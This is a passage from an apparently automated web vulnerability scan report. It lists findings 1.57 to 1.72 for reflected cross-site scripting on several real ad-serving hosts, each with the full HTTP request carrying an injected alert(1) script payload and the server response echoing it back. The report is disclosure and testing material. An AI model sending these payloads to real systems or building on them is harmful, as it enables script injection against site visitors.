Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 321

<html><body><base target=_blankab782><script>alert(1)</script>6e76889d9da><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7
...[SNIP]...

1.57. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The value of the AdId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25c14"><script>alert(1)</script>a4b96fa0e6e was submitted in the AdId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank25c14"><script>alert(1)</script>a4b96fa0e6e HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank25c14"><script>alert(1)</script>a4b96fa0e6e><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank25c14"><script>alert(1)</script>a4b96fa0e6e;adiframe=y">
...[SNIP]...

1.58. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b69b0"><script>alert(1)</script>eeb789feb65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECHb69b0"><script>alert(1)</script>eeb789feb65;AdId=1343354;BnId=-1;;target=_blank HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 280

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECHb69b0"><script>alert(1)</script>eeb789feb65;AdId=1343354;BnId=-1;;target=_blank;adiframe=y">
...[SNIP]...

1.59. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 566fc><script>alert(1)</script>ed3badced5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank&566fc><script>alert(1)</script>ed3badced5a=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 327

<html><body><base target=_blank&566fc><script>alert(1)</script>ed3badced5a=1><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C1
...[SNIP]...

1.60. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87299"><script>alert(1)</script>d8233ba9cbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank&87299"><script>alert(1)</script>d8233ba9cbc=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 329

<html><body><base target=_blank&87299"><script>alert(1)</script>d8233ba9cbc=1><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank&87299"><script>alert(1)</script>d8233ba9cbc=1;adiframe=y">
...[SNIP]...

1.61. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f2f4"><script>alert(1)</script>fe7203a0cd3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe7f2f4"><script>alert(1)</script>fe7203a0cd3/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn7f2f4"><script>alert(1)</script>fe7203a0cd3/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.62. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3a3c"><script>alert(1)</script>9ea027e7c9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0e3a3c"><script>alert(1)</script>9ea027e7c9b/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0e3a3c"><script>alert(1)</script>9ea027e7c9b/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.63. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3700"><script>alert(1)</script>c1d53990b82 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235c3700"><script>alert(1)</script>c1d53990b82/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235c3700"><script>alert(1)</script>c1d53990b82/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.64. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aafad"><script>alert(1)</script>58e3214e0d4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606aafad"><script>alert(1)</script>58e3214e0d4/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606aafad"><script>alert(1)</script>58e3214e0d4/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.65. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64130"><script>alert(1)</script>4aff41005f7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/064130"><script>alert(1)</script>4aff41005f7/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/064130"><script>alert(1)</script>4aff41005f7/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.66. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86bda"><script>alert(1)</script>f0041c3072b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/15486bda"><script>alert(1)</script>f0041c3072b/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/15486bda"><script>alert(1)</script>f0041c3072b/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.67. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fd55"><script>alert(1)</script>94b70172a07 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH9fd55"><script>alert(1)</script>94b70172a07;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH9fd55"><script>alert(1)</script>94b70172a07;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.68. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [cookie parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of the cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c48c"><script>alert(1)</script>9172a92def1 was submitted in the cookie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=0000019c48c"><script>alert(1)</script>9172a92def1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=0000019c48c"><script>alert(1)</script>9172a92def1;adiframe=y">
...[SNIP]...

1.69. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd538"><script>alert(1)</script>254bcc5e869 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&fd538"><script>alert(1)</script>254bcc5e869=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 297

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&fd538"><script>alert(1)</script>254bcc5e869=1;adiframe=y">
...[SNIP]...

1.70. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30ced"-alert(1)-"bb2604ed03b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=ad&ad_size=728x90&section=967562&30ced"-alert(1)-"bb2604ed03b=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/216/us/728x90/news?t=1297647385452&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.independent.co.uk%2Fnews%2Fworld%2Fafrica%2Fis-the-army-tightening-its-grip-on-egypt-2213849.html&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:35 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 14 Feb 2011 01:37:35 GMT
Pragma: no-cache
Content-Length: 4332
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://adserving.cpxinteractive.com/imp?30ced"-alert(1)-"bb2604ed03b=1&Z=728x90&s=967562&_salt=1387362591";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr
...[SNIP]...

1.71. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-4

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3685f'-alert(1)-'4d88b1eaae was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-4?mpt=21704443685f'-alert(1)-'4d88b1eaae&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/a%3B234423004%3B0-0%3B1%3B20580498%3B4307-300/250%3B40033801/40051588/1%3B%3B%7Eokv%3D%3Bad%3Dbb%3Bsz%3D300x250%3Bpos%3Dinline_bb%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Diframe%3Bfromrss%3Dn%3Brss%3Dn%3Bheavy%3Dy%3Bpage%3Darticle%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 462
Date: Mon, 14 Feb 2011 01:38:23 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/a;234423004;0-0;1;20580498;4307-300/250;40033801/40051588/1;;~okv=;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;~aopt=6/0/ff/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=21704443685f'-alert(1)-'4d88b1eaae">
...[SNIP]...

1.72. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
